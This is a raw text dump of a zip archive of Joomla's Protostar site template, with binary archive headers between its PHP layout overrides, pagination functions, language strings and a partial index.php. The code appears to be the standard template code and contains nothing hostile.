	$moduleTag     = htmlspecialchars($params->get('module_tag', 'div'), ENT_QUOTES, 'UTF-8');
	$bootstrapSize = (int) $params->get('bootstrap_size', 0);
	$moduleClass   = $bootstrapSize !== 0 ? ' span' . $bootstrapSize : '';
	$headerTag     = htmlspecialchars($params->get('header_tag', 'h3'), ENT_QUOTES, 'UTF-8');
	$headerClass   = htmlspecialchars($params->get('header_class', 'page-header'), ENT_COMPAT, 'UTF-8');

	if ($module->content)
	{
		echo '<' . $moduleTag . ' class="well ' . htmlspecialchars($params->get('moduleclass_sfx', ''), ENT_COMPAT, 'UTF-8') . $moduleClass . '">';

			if ($module->showtitle)
			{
				echo '<' . $headerTag . ' class="' . $headerClass . '">' . $module->title . '</' . $headerTag . '>';
			}

			echo $module->content;
		echo '</' . $moduleTag . '>';
	}
}
PK՜�\,`�a��protostar/html/pagination.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * This is a file to add template specific chrome to pagination rendering.
 *
 * pagination_list_footer
 * 	Input variable $list is an array with offsets:
 * 		$list[limit]		: int
 * 		$list[limitstart]	: int
 * 		$list[total]		: int
 * 		$list[limitfield]	: string
 * 		$list[pagescounter]	: string
 * 		$list[pageslinks]	: string
 *
 * pagination_list_render
 * 	Input variable $list is an array with offsets:
 * 		$list[all]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[start]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[previous]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[next]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[end]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[pages]
 * 			[{PAGE}][data]		: string
 * 			[{PAGE}][active]	: boolean
 *
 * pagination_item_active
 * 	Input variable $item is an object with fields:
 * 		$item->base	: integer
 * 		$item->link	: string
 * 		$item->text	: string
 *
 * pagination_item_inactive
 * 	Input variable $item is an object with fields:
 * 		$item->base	: integer
 * 		$item->link	: string
 * 		$item->text	: string
 *
 * This gives template designers ultimate control over how pagination is rendered.
 *
 * NOTE: If you override pagination_item_active OR pagination_item_inactive you MUST override them both
 */

/**
 * Renders the pagination footer
 *
 * @param   array   $list  Array containing pagination footer
 *
 * @return  string         HTML markup for the full pagination footer
 *
 * @since   3.0
 */
function pagination_list_footer($list)
{
	$html = "<div class=\"pagination\">\n";
	$html .= $list['pageslinks'];
	$html .= "\n<input type=\"hidden\" name=\"" . $list['prefix'] . "limitstart\" value=\"" . $list['limitstart'] . "\" />";
	$html .= "\n</div>";

	return $html;
}

/**
 * Renders the pagination list
 *
 * @param   array   $list  Array containing pagination information
 *
 * @return  string         HTML markup for the full pagination object
 *
 * @since   3.0
 */
function pagination_list_render($list)
{
	// Calculate to display range of pages
	$currentPage = 1;
	$range = 1;
	$step = 5;
	foreach ($list['pages'] as $k => $page)
	{
		if (!$page['active'])
		{
			$currentPage = $k;
		}
	}
	if ($currentPage >= $step)
	{
		if ($currentPage % $step === 0)
		{
			$range = ceil($currentPage / $step) + 1;
		}
		else
		{
			$range = ceil($currentPage / $step);
		}
	}

	$html  = '<nav role="navigation" aria-label="' . JText::_('JLIB_HTML_PAGINATION') . '">';
	$html .= '<ul class="pagination-list">';
	$html .= $list['start']['data'];
	$html .= $list['previous']['data'];

	foreach ($list['pages'] as $k => $page)
	{
		if ($k !== $currentPage && $k !== $range * $step - $step
			&& ($k % $step === 0 || $k === $range * $step - ($step + 1))
			&& in_array($k, range($range * $step - ($step + 1), $range * $step)))
		{
			$page['data'] = preg_replace('#(<a.*?>).*?(</a>)#', '$1...$2', $page['data']);
		}

		$html .= $page['data'];
	}

	$html .= $list['next']['data'];
	$html .= $list['end']['data'];

	$html .= '</ul>';
	$html .= '</nav>';
	return $html;
}

/**
 * Renders an active item in the pagination block
 *
 * @param   JPaginationObject  $item  The current pagination object
 *
 * @return  string                    HTML markup for active item
 *
 * @since   3.0
 */
function pagination_item_active(&$item)
{
	$class = '';

	// Check for "Start" item
	if ($item->text === JText::_('JLIB_HTML_START'))
	{
		$display = '<span class="icon-first" aria-hidden="true"></span>';
		$aria    = JText::sprintf('JLIB_HTML_GOTO_POSITION', strtolower($item->text));
	}

	// Check for "Prev" item
	if ($item->text === JText::_('JPREV'))
	{
		$display = '<span class="icon-previous" aria-hidden="true"></span>';
		$aria    = JText::sprintf('JLIB_HTML_GOTO_POSITION', strtolower($item->text));
	}

	// Check for "Next" item
	if ($item->text === JText::_('JNEXT'))
	{
		$display = '<span class="icon-next" aria-hidden="true"></span>';
		$aria    = JText::sprintf('JLIB_HTML_GOTO_POSITION', strtolower($item->text));
	}

	// Check for "End" item
	if ($item->text === JText::_('JLIB_HTML_END'))
	{
		$display = '<span class="icon-last" aria-hidden="true"></span>';
		$aria    = JText::sprintf('JLIB_HTML_GOTO_POSITION', strtolower($item->text));
	}

	// If the display object isn't set already, just render the item with its text
	if (!isset($display))
	{
		$display = $item->text;
		$aria    = JText::sprintf('JLIB_HTML_GOTO_PAGE', $item->text);
		$class   = ' class="hidden-phone"';
	}

	return '<li' . $class . '><a title="' . $item->text . '" href="' . $item->link . '" class="pagenav" aria-label="' . $aria . '">' . $display . '</a></li>';

}

/**
 * Renders an inactive item in the pagination block
 *
 * @param   JPaginationObject  $item  The current pagination object
 *
 * @return  string  HTML markup for inactive item
 *
 * @since   3.0
 */
function pagination_item_inactive(&$item)
{
	// Check for "Start" item
	if ($item->text === JText::_('JLIB_HTML_START'))
	{
		return '<li class="disabled"><a><span class="icon-first" aria-hidden="true"></span></a></li>';
	}

	// Check for "Prev" item
	if ($item->text === JText::_('JPREV'))
	{
		return '<li class="disabled"><a><span class="icon-previous" aria-hidden="true"></span></a></li>';
	}

	// Check for "Next" item
	if ($item->text === JText::_('JNEXT'))
	{
		return '<li class="disabled"><a><span class="icon-next" aria-hidden="true"></span></a></li>';
	}

	// Check for "End" item
	if ($item->text === JText::_('JLIB_HTML_END'))
	{
		return '<li class="disabled"><a><span class="icon-last" aria-hidden="true"></span></a></li>';
	}

	// Check if the item is the active page
	if (isset($item->active) && $item->active)
	{
		$aria = JText::sprintf('JLIB_HTML_PAGE_CURRENT', $item->text);

		return '<li class="active hidden-phone"><a aria-current="true" aria-label="' . $aria . '">' . $item->text . '</a></li>';
	}

	// Doesn't match any other condition, render a normal item
	return '<li class="disabled hidden-phone"><a>' . $item->text . '</a></li>';
}
PK՜�\?Ǡ��0protostar/html/layouts/joomla/system/message.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.protostar
 *
 * @copyright   (C) 2015 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$msgList = $displayData['msgList'];

$alert = array('error' => 'alert-error', 'warning' => '', 'notice' => 'alert-info', 'message' => 'alert-success');
?>
<div id="system-message-container">
	<?php if (is_array($msgList) && !empty($msgList)) : ?>
		<div id="system-message">
			<?php foreach ($msgList as $type => $msgs) : ?>
				<div class="alert <?php echo isset($alert[$type]) ? $alert[$type] : 'alert-' . $type; ?>">
					<?php // This requires JS so we should add it through JS. Progressive enhancement and stuff. ?>
					<a class="close" data-dismiss="alert">×</a>

					<?php if (!empty($msgs)) : ?>
						<h4 class="alert-heading"><?php echo JText::_($type); ?></h4>
						<div>
							<?php foreach ($msgs as $msg) : ?>
								<div class="alert-message"><?php echo $msg; ?></div>
							<?php endforeach; ?>
						</div>
					<?php endif; ?>
				</div>
			<?php endforeach; ?>
		</div>
	<?php endif; ?>
</div>
PK՜�\�l����2protostar/html/layouts/joomla/form/field/media.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   (C) 2015 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Layout variables
 * ---------------------
 *
 * @var  string   $asset The asset text
 * @var  string   $authorField The label text
 * @var  integer  $authorId The author id
 * @var  string   $class The class text
 * @var  boolean  $disabled True if field is disabled
 * @var  string   $folder The folder text
 * @var  string   $id The label text
 * @var  string   $link The link text
 * @var  string   $name The name text
 * @var  string   $preview The preview image relative path
 * @var  integer  $previewHeight The image preview height
 * @var  integer  $previewWidth The image preview width
 * @var  string   $onchange  The onchange text
 * @var  boolean  $readonly True if field is readonly
 * @var  integer  $size The size text
 * @var  string   $value The value text
 * @var  string   $src The path and filename of the image
 */
extract($displayData);

// The button.
if ($disabled != true)
{
	JHtml::_('bootstrap.tooltip');
}

$attr = '';

// Initialize some field attributes.
$attr .= !empty($class) ? ' class="input-small hasTooltip field-media-input ' . $class . '"' : ' class="input-small hasTooltip field-media-input"';
$attr .= !empty($size) ? ' size="' . $size . '"' : '';

// Initialize JavaScript field attributes.
$attr .= !empty($onchange) ? ' onchange="' . $onchange . '"' : '';

switch ($preview)
{
	case 'no': // Deprecated parameter value
	case 'false':
	case 'none':
		$showPreview = false;
		$showAsTooltip = false;
		break;
	case 'yes': // Deprecated parameter value
	case 'true':
	case 'show':
		$showPreview = true;
		$showAsTooltip = false;
		break;
	case 'tooltip':
	default:
		$showPreview = true;
		$showAsTooltip = true;
		break;
}

// Pre fill the contents of the popover
if ($showPreview)
{
	if ($value && file_exists(JPATH_ROOT . '/' . $value))
	{
		$src = JUri::root() . $value;
	}
	else
	{
		$src = JText::_('JLIB_FORM_MEDIA_PREVIEW_EMPTY');
	}
}

// The URL for the modal
$url    = ($readonly ? ''
	: ($link ?: 'index.php?option=com_media&amp;view=images&amp;tmpl=component&amp;asset='
		. $asset . '&amp;author=' . $authorId)
	. '&amp;fieldid={field-media-id}&amp;ismoo=0&amp;folder=' . $folder);
?>
<div class="field-media-wrapper"
	data-basepath="<?php echo JUri::root(); ?>"
	data-url="<?php echo $url; ?>"
	data-modal=".modal"
	data-modal-width="100%"
	data-modal-height="400px"
	data-input=".field-media-input"
	data-button-select=".button-select"
	data-button-clear=".button-clear"
	data-button-save-selected=".button-save-selected"
	data-preview="<?php echo $showPreview ? 'true' : 'false'; ?>"
	data-preview-as-tooltip="<?php echo $showAsTooltip ? 'true' : 'false'; ?>"
	data-preview-container=".field-media-preview"
	data-preview-width="<?php echo $previewWidth; ?>"
	data-preview-height="<?php echo $previewHeight; ?>"
>
	<?php
	// Render the modal
	echo JHtml::_('bootstrap.renderModal',
		'imageModal_'. $id,
		array(
			'title' => JText::_('JLIB_FORM_CHANGE_IMAGE'),
			'closeButton' => true,
			'footer' => '<button type="button" class="btn" data-dismiss="modal">' . JText::_('JCANCEL') . '</button>'
		)
	);

	JHtml::_('script', 'media/mediafield.min.js', array('version' => 'auto', 'relative' => true));
	?>
	<?php if ($showPreview && $showAsTooltip) : ?>
	<div class="input-prepend input-append">
		<span rel="popover" class="add-on pop-helper field-media-preview"
			title="<?php echo	JText::_('JLIB_FORM_MEDIA_PREVIEW_SELECTED_IMAGE'); ?>" data-content="<?php echo JText::_('JLIB_FORM_MEDIA_PREVIEW_EMPTY'); ?>"
			data-original-title="<?php echo JText::_('JLIB_FORM_MEDIA_PREVIEW_SELECTED_IMAGE'); ?>" data-trigger="hover">
			<span class="icon-eye" aria-hidden="true"></span>
		</span>
	<?php else: ?>
	<div class="input-append">
	<?php endif; ?>
		<input type="text" name="<?php echo $name; ?>" id="<?php echo $id; ?>" value="<?php echo htmlspecialchars($value, ENT_COMPAT, 'UTF-8'); ?>" readonly="readonly"<?php echo $attr; ?>/>
		<?php if ($disabled != true) : ?>
			<button type="button" class="btn button-select"><?php echo JText::_("JLIB_FORM_BUTTON_SELECT"); ?></button>
			<button
				type="button"
				class="btn hasTooltip button-clear"
				title="<?php echo JText::_("JLIB_FORM_BUTTON_CLEAR"); ?>"
				aria-label="<?php echo JText::_("JLIB_FORM_BUTTON_CLEAR"); ?>"
				>
				<span class="icon-remove" aria-hidden="true"></span>
			</button>
		<?php endif; ?>
	</div>
	<?php if ($showPreview && !$showAsTooltip) : ?>
		<div class="field-media-preview" style="width: <?php echo $previewWidth; ?>px; max-height: <?php echo $previewHeight; ?>px;margin-top:10px;"></div>
	<?php endif; ?>
</div>
PK՜�\
f(^�
�
;protostar/html/layouts/joomla/form/field/contenthistory.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   (C) 2015 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Layout variables
 * -----------------
 * @var   string   $autocomplete    Autocomplete attribute for the field.
 * @var   boolean  $autofocus       Is autofocus enabled?
 * @var   string   $class           Classes for the input.
 * @var   string   $description     Description of the field.
 * @var   boolean  $disabled        Is this field disabled?
 * @var   string   $group           Group the field belongs to. <fields> section in form XML.
 * @var   boolean  $hidden          Is this field hidden in the form?
 * @var   string   $hint            Placeholder for the field.
 * @var   string   $id              DOM id of the field.
 * @var   string   $label           Label of the field.
 * @var   string   $labelclass      Classes to apply to the label.
 * @var   boolean  $multiple        Does this field support multiple values?
 * @var   string   $name            Name of the input field.
 * @var   string   $onchange        Onchange attribute for the field.
 * @var   string   $onclick         Onclick attribute for the field.
 * @var   string   $pattern         Pattern (Reg Ex) of value of the form field.
 * @var   boolean  $readonly        Is this field read only?
 * @var   boolean  $repeat          Allows extensions to duplicate elements.
 * @var   boolean  $required        Is this field required?
 * @var   integer  $size            Size attribute of the input.
 * @var   boolean  $spellcheck       Spellcheck state for the form field.
 * @var   string   $validate        Validation rules to apply.
 * @var   string   $value           Value attribute of the field.
 * @var   array    $checkedOptions  Options that will be set as checked.
 * @var   boolean  $hasValue        Has this field a value assigned?
 * @var   array    $options         Options available for this field.
 *
 * @var   string   $link            The link for the content history page
 * @var   string   $label           The label text
 */
extract($displayData);

echo JHtml::_(
	'bootstrap.renderModal',
	'versionsModal',
	array(
		'url'    => $link,
		'title'  => $label,
		'height' => '300px',
		'width'  => '800px',
		'footer' => '<button type="button" class="btn" data-dismiss="modal">'
			. JText::_('JLIB_HTML_BEHAVIOR_CLOSE') . '</button>'
	)
);

?>
<button type="button" onclick="jQuery('#versionsModal').modal('show')" class="btn versions" data-toggle="modal" title="<?php echo $label; ?>">
	<span class="icon-archive" aria-hidden="true"></span><?php echo $label; ?>
</button>
PK՜�\��
�@@1protostar/html/layouts/joomla/form/field/user.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   (C) 2015 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

extract($displayData);

/**
 * Layout variables
 * -----------------
 * @var   string   $autocomplete    Autocomplete attribute for the field.
 * @var   boolean  $autofocus       Is autofocus enabled?
 * @var   string   $class           Classes for the input.
 * @var   string   $description     Description of the field.
 * @var   boolean  $disabled        Is this field disabled?
 * @var   string   $group           Group the field belongs to. <fields> section in form XML.
 * @var   boolean  $hidden          Is this field hidden in the form?
 * @var   string   $hint            Placeholder for the field.
 * @var   string   $id              DOM id of the field.
 * @var   string   $label           Label of the field.
 * @var   string   $labelclass      Classes to apply to the label.
 * @var   boolean  $multiple        Does this field support multiple values?
 * @var   string   $name            Name of the input field.
 * @var   string   $onchange        Onchange attribute for the field.
 * @var   string   $onclick         Onclick attribute for the field.
 * @var   string   $pattern         Pattern (Reg Ex) of value of the form field.
 * @var   boolean  $readonly        Is this field read only?
 * @var   boolean  $repeat          Allows extensions to duplicate elements.
 * @var   boolean  $required        Is this field required?
 * @var   integer  $size            Size attribute of the input.
 * @var   boolean  $spellcheck      Spellcheck state for the form field.
 * @var   string   $validate        Validation rules to apply.
 * @var   string   $value           Value attribute of the field.
 * @var   array    $checkedOptions  Options that will be set as checked.
 * @var   boolean  $hasValue        Has this field a value assigned?
 * @var   array    $options         Options available for this field.
 *
 * @var   string   $userName        The user name
 * @var   mixed    $groups          The filtering groups (null means no filtering)
 * @var   mixed    $exclude         The users to exclude from the list of users
 */

// Set the link for the user selection page
$link = 'index.php?option=com_users&amp;view=users&amp;layout=modal&amp;tmpl=component&amp;required='
	. ($required ? 1 : 0) . '&amp;field={field-user-id}&amp;ismoo=0'
	. (isset($groups) ? ('&amp;groups=' . base64_encode(json_encode($groups))) : '')
	. (isset($excluded) ? ('&amp;excluded=' . base64_encode(json_encode($excluded))) : '');

// Invalidate the input value if no user selected
if (JText::_('JLIB_FORM_SELECT_USER') === htmlspecialchars($userName, ENT_COMPAT, 'UTF-8'))
{
	$userName = '';
}

if (!$readonly)
{
	JHtml::_('script', 'jui/fielduser.min.js', array('version' => 'auto', 'relative' => true));
}
?>
<?php // Create a dummy text field with the user name. ?>
<div class="field-user-wrapper"
	data-url="<?php echo $link; ?>"
	data-modal=".modal"
	data-modal-width="100%"
	data-modal-height="400px"
	data-input=".field-user-input"
	data-input-name=".field-user-input-name"
	data-button-select=".button-select"
	>
	<div class="input-append">
		<input
			type="text" id="<?php echo $id; ?>"
			value="<?php echo  htmlspecialchars($userName, ENT_COMPAT, 'UTF-8'); ?>"
			placeholder="<?php echo JText::_('JLIB_FORM_SELECT_USER'); ?>"
			readonly
			class="field-user-input-name <?php echo $class ? (string) $class : ''?>"
			<?php echo $size ? ' size="' . (int) $size . '"' : ''; ?>
			<?php echo $required ? 'required' : ''; ?>/>
		<?php if (!$readonly) : ?>
			<button
				type="button"
				class="btn btn-primary button-select"
				title="<?php echo JText::_('JLIB_FORM_CHANGE_USER') ?>"
				aria-label="<?php echo JText::_('JLIB_FORM_CHANGE_USER') ?>"
				>
				<span class="icon-user" aria-hidden="true"></span>
			</button>
			<?php echo JHtml::_(
				'bootstrap.renderModal',
				'userModal_' . $id,
				array(
					'title'  => JText::_('JLIB_FORM_CHANGE_USER'),
					'closeButton' => true,
					'footer' => '<button type="button" class="btn" data-dismiss="modal">' . JText::_('JCANCEL') . '</button>',
				)
			); ?>
		<?php endif; ?>
	</div>
	<?php // Create the real field, hidden, that stored the user id. ?>
	<?php if (!$readonly) : ?>
		<input type="hidden" id="<?php echo $id; ?>_id" name="<?php echo $name; ?>" value="<?php echo (int) $value; ?>"
			class="field-user-input <?php echo $class ? (string) $class : ''?>"
			data-onchange="<?php echo $this->escape($onchange); ?>"/>
	<?php endif; ?>
</div>
PK՜�\b�e�kk5protostar/html/com_media/imageslist/default_image.phpnu�[���<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  com_media
 *
 * @copyright   (C) 2017 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

use Joomla\Registry\Registry;

$params     = new Registry;
$dispatcher = JEventDispatcher::getInstance();
$dispatcher->trigger('onContentBeforeDisplay', array('com_media.file', &$this->_tmp_img, &$params, 0));
?>

<li class="imgOutline thumbnail height-80 width-80 center">
	<a class="img-preview" href="javascript:ImageManager.populateFields('<?php echo $this->escape($this->_tmp_img->path_relative); ?>')" title="<?php echo $this->escape($this->_tmp_img->name); ?>" >
		<div class="imgThumb">
			<div class="imgThumbInside">
			<?php echo JHtml::_('image', $this->baseURL . '/' . $this->escape($this->_tmp_img->path_relative), JText::sprintf('COM_MEDIA_IMAGE_TITLE', $this->escape($this->_tmp_img->title), JHtml::_('number.bytes', $this->_tmp_img->size)), array('width' => $this->_tmp_img->width_60, 'height' => $this->_tmp_img->height_60)); ?>
			</div>
		</div>
		<div class="imgDetails small">
			<?php echo JHtml::_('string.truncate', $this->escape($this->_tmp_img->name), 10, false); ?>
		</div>
	</a>
</li>
<?php
$dispatcher->trigger('onContentAfterDisplay', array('com_media.file', &$this->_tmp_img, &$params, 0));
PK՜�\e�WW6protostar/html/com_media/imageslist/default_folder.phpnu�[���<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  com_media
 *
 * @copyright   (C) 2017 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$input = JFactory::getApplication()->input;
?>
<li class="imgOutline thumbnail height-80 width-80 center">
	<a href="index.php?option=com_media&amp;view=imagesList&amp;tmpl=component&amp;folder=<?php echo rawurlencode($this->_tmp_folder->path_relative); ?>&amp;asset=<?php echo $input->getCmd('asset');?>&amp;author=<?php echo $input->getCmd('author');?>" target="imageframe">
		<div class="imgFolder">
			<span class="icon-folder-2"></span>
		</div>
		<div class="small">
			<?php echo JHtml::_('string.truncate', $this->escape($this->_tmp_folder->name), 10, false); ?>
		</div>
	</a>
</li>
PK՜�\����4protostar/language/en-GB/en-GB.tpl_protostar.sys.ininu�[���; Joomla! Project
; (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

TPL_PROTOSTAR_POSITION_BANNER="Banner"
TPL_PROTOSTAR_POSITION_DEBUG="Debug"
TPL_PROTOSTAR_POSITION_POSITION-0="Search"
TPL_PROTOSTAR_POSITION_POSITION-10="Unused"
TPL_PROTOSTAR_POSITION_POSITION-11="Unused"
TPL_PROTOSTAR_POSITION_POSITION-12="Unused"
TPL_PROTOSTAR_POSITION_POSITION-13="Unused"
TPL_PROTOSTAR_POSITION_POSITION-14="Unused"
TPL_PROTOSTAR_POSITION_POSITION-15="Unused"
TPL_PROTOSTAR_POSITION_POSITION-1="Navigation"
TPL_PROTOSTAR_POSITION_POSITION-2="Breadcrumbs"
TPL_PROTOSTAR_POSITION_POSITION-3="Top center"
TPL_PROTOSTAR_POSITION_POSITION-4="Unused"
TPL_PROTOSTAR_POSITION_POSITION-5="Unused"
TPL_PROTOSTAR_POSITION_POSITION-6="Unused"
TPL_PROTOSTAR_POSITION_POSITION-7="Right"
TPL_PROTOSTAR_POSITION_POSITION-8="Left"
TPL_PROTOSTAR_POSITION_POSITION-9="Unused"
TPL_PROTOSTAR_POSITION_FOOTER="Footer"
TPL_PROTOSTAR_XML_DESCRIPTION="Continuing the space theme (Solarflare from 1.0 and Milkyway from 1.5), Protostar is the Joomla 3 site template based on Bootstrap and the launch of the Joomla User Interface library (JUI)."
PK՜�\p�hU��0protostar/language/en-GB/en-GB.tpl_protostar.ininu�[���; Joomla! Project
; (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

TPL_PROTOSTAR_XML_DESCRIPTION="Continuing the space theme (Solarflare from 1.0 and Milkyway from 1.5), Protostar is the Joomla 3 site template based on Bootstrap and the launch of the Joomla User Interface library (JUI)."

TPL_PROTOSTAR_BACKGROUND_COLOR_DESC="Choose a background colour for static layouts. If left blank the Default (#f4f6f7) is used."
TPL_PROTOSTAR_BACKGROUND_COLOR_LABEL="Background Colour"
TPL_PROTOSTAR_BACKTOTOP="Back to Top"
TPL_PROTOSTAR_COLOR_DESC="Choose an overall colour for the site template. If left blank the Default (#0088cc) is used."
TPL_PROTOSTAR_COLOR_LABEL="Template Colour"
TPL_PROTOSTAR_FLUID="Fluid"
TPL_PROTOSTAR_FLUID_LABEL="Fluid Layout"
TPL_PROTOSTAR_FLUID_DESC="Use Bootstrap's fluid or static container (both are responsive)."
TPL_PROTOSTAR_FONT_LABEL="Google Font for Headings"
TPL_PROTOSTAR_FONT_DESC="Load a Google font for the headings (H1, H2, H3, etc)."
TPL_PROTOSTAR_FONT_NAME_LABEL="Google Font Name"
TPL_PROTOSTAR_FONT_NAME_DESC="Example: Open+Sans or Source+Sans+Pro."
TPL_PROTOSTAR_LOGO_LABEL="Logo"
TPL_PROTOSTAR_LOGO_DESC="Select or upload a custom logo for the site template."
TPL_PROTOSTAR_STATIC="Static"
TPL_PROTOSTAR_TOGGLE_MENU="Toggle Navigation"

PK՜�\ׇ�a

protostar/index.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentHtml $this */

$app  = JFactory::getApplication();
$user = JFactory::getUser();

// Output as HTML5
$this->setHtml5(true);

// Getting params from template
$params = $app->getTemplate(true)->params;

// Detecting Active Variables
$option   = $app->input->getCmd('option', '');
$view     = $app->input->getCmd('view', '');
$layout   = $app->input->getCmd('layout', '');
$task     = $app->input->getCmd('task', '');
$itemid   = $app->input->getCmd('Itemid', '');
$sitename = htmlspecialchars($app->get('sitename'), ENT_QUOTES, 'UTF-8');

// Add JavaScript Frameworks
JHtml::_('bootstrap.framework');

// Add template js
JHtml::_('script', 'template.js', array('version' => 'auto', 'relative' => true));

// Add html5 shiv
JHtml::_('script', 'jui/html5.js', array('version' => 'auto', 'relative' => true, 'conditional' => 'lt IE 9'));

// Add Stylesheets
JHtml::_('stylesheet', 'template.css', array('version' => 'auto', 'relative' => true));

// Use of Google Font
if ($this->params->get('googleFont'))
{
	$font = $this->params->get('googleFontName');

	// Handle fonts with selected weights and styles, e.g. Source+Sans+Condensed:400,400i
	$fontStyle = str_replace('+', ' ', strstr($font, ':', true) ?: $font);

	JHtml::_('stylesheet', 'https://fonts.googleapis.com/css?family=' . $font);
	$this->addStyleDeclaration("
	h1, h2, h3, h4, h5, h6, .site-title {
		font-family: '" . $fontStyle . "', sans-serif;
	}");
}

// Template color
if ($this->params->get('templateColor'))
{
	$this->addStyleDeclaration('
	body.site {
		border-top: 3px solid ' . $this->params->get('templateColor') . ';
		background-color: ' . $this->params->get('templateBackgroundColor') . ';
	}
	a {
		color: ' . $this->params->get('templateColor') . ';
	}
	.nav-list > .active > a,
	.nav-list > .active > a:hover,
	.dropdown-menu li > a:hover,
	.dropdown-menu .active > a,
	.dropdown-menu .active > a:hover,
	.nav-pills > .active > a,
	.nav-pills > .active > a:hover,
	.btn-primary {
		background: ' . $this->params->get('templateColor') . ';
	}');
}

// Check for a custom CSS file
JHtml::_('stylesheet', 'user.css', array('version' => 'auto', 'relative' => true));

// Check for a custom js file
JHtml::_('script', 'user.js', array('version' => 'auto', 'relative' => true));

// Load optional RTL Bootstrap CSS
JHtml::_('bootstrap.loadCss', false, $this->direction);

// Adjusting content width
$position7ModuleCount = $this->countModules('position-7');
$position8ModuleCount = $this->countModules('position-8');

if ($position7ModuleCount && $position8ModuleCount)
{
	$span = 'span6';
}
elseif ($position7ModuleCount && !$position8ModuleCount)
{
	$span = 'span9';
}
elseif (!$position7ModuleCount && $position8ModuleCount)
{
	$span = 'span9';
}
else
{
	$span = 'span12';
}

// Logo file or site title param
if ($this->params->get('logoFile'))
{
	$logo = '<img src="' . htmlspecialchars(JUri::root() . $this->params->get('logoFile'), ENT_QUOTES) . '" alt="' . $sitename . '" />';
}
elseif ($this->params->get('sitetitle'))
{
	$logo = '<span class="site-title" title="' . $sitename . '">' . htmlspecialchars($this->params->get('sitetitle'), ENT_COMPAT, 'UTF-8') . '</span>';
}
else
{
	$logo = '<span class="site-title" title="' . $sitename . '">' . $sitename . '</span>';
}
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1.0" />
	<jdoc:include type="head" />
</head>
<body class="site <?php echo $option
	. ' view-' . $view
	. ($layout ? ' layout-' . $layout : ' no-layout')
	. ($task ? ' task-' . $task : ' no-task')
	. ($itemid ? ' itemid-' . $itemid : '')
	. ($params->get('fluidContainer') ? ' fluid' : '')
	. ($this->direction === 'rtl' ? ' rtl' : '');
?>">
	<!-- Body -->
	<div class="body" id="top">
		<div class="container<?php echo ($params->get('fluidContainer') ? '-fluid' : ''); ?>">
			<!-- Header -->
			<header class="header" role="banner">
				<div class="header-inner clearfix">
					<a class="brand pull-left" href="<?php echo $this->baseurl; ?>/">
						<?php echo $logo; ?>
						<?php if ($this->params->get('sitedescription')) : ?>
							<?php echo '<div class="site-description">' . htmlspecialchars($this->params->get('sitedescription'), ENT_COMPAT, 'UTF-8') . '</div>'; ?>
						<?php endif; ?>
					</a>
					<div class="header-search pull-right">
						<jdoc:include type="modules" name="position-0" style="none" />
					</div>
				</div>
			</header>
			<?php if ($this->countModules('position-1')) : ?>
				<nav class="navigation" role="navigation">
					<div class="navbar pull-left">
						<a class="btn btn-navbar collapsed" data-toggle="collapse" data-target=".nav-collapse">
							<span class="element-invisible"><?php echo JTEXT::_('TPL_PROTOSTAR_TOGGLE_MENU'); ?></span>
							<span class="icon-bar"></span>
							<span class="icon-bar"></span>
							<span class="icon-bar"></span>
						</a>
					</div>
					<div class="nav-collapse">
						<jdoc:include type="modules" name="position-1" style="none" />
					</div>
				</nav>
			<?php endif; ?>
			<jdoc:include type="modules" name="banner" style="xhtml" />
			<div class="row-fluid">
				<?php if ($position8ModuleCount) : ?>
					<!-- Begin Sidebar -->
					<div id="sidebar" class="span3">
						<div class="sidebar-nav">
							<jdoc:include type="modules" name="position-8" style="xhtml" />
						</div>
					</div>
					<!-- End Sidebar -->
				<?php endif; ?>
				<main id="content" role="main" class="<?php echo $span; ?>">
					<!-- Begin Content -->
					<jdoc:include type="modules" name="position-3" style="xhtml" />
					<jdoc:include type="message" />
					<jdoc:include type="component" />
					<div class="clearfix"></div>
					<jdoc:include type="modules" name="position-2" style="none" />
					<!-- End Content -->
				</main>
				<?php if ($position7ModuleCount) : ?>
					<div id="aside" class="span3">
						<!-- Begin Right Sidebar -->
						<jdoc:include type="modules" name="position-7" style="well" />
						<!-- End Right Sidebar -->
					</div>
				<?php endif; ?>
			</div>
